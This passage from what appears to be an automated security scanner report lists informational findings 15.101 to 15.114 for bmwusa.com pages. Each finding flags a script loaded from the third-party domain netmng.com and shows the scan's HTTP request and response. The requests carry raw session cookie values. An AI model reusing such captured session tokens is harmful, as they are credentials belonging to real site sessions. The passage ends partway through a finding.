Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:19 GMT;path=/
Content-Length: 215092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.101. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/3seriescoupemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:36 GMT;path=/
Content-Length: 202376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.102. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:26:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:46:20 GMT;path=/
Content-Length: 215070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.103. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:37 GMT;path=/
Content-Length: 225949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.104. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335ixdrivecoupe/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:27:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:47:15 GMT;path=/
Content-Length: 216307


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.105. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:59 GMT;path=/
Content-Length: 202183


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.106. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:38 GMT;path=/
Content-Length: 215063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.107. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:12 GMT;path=/
Content-Length: 226227


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.108. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/335ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:45 GMT;path=/
Content-Length: 216433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.109. http://www.bmwusa.com/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/3convertibleexplorenew.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/3convertibleexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:28:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:48:54 GMT;path=/
Content-Length: 180296


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.110. http://www.bmwusa.com/standard/content/vehicles/2011/3/3coupeexplorenew.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/3coupeexplorenew.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/3coupeexplorenew.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:21 GMT;path=/
Content-Length: 180154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.111. http://www.bmwusa.com/standard/content/vehicles/2011/3/3sedanexplore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/3sedanexplore.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/3sedanexplore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:41 GMT;path=/
Content-Length: 179241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.112. http://www.bmwusa.com/standard/content/vehicles/2011/3/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/3/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/3/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:07:40 GMT;path=/
Content-Length: 210063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.113. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:42:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:02:35 GMT;path=/
Content-Length: 201964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.114. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/5/528isedan/5seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
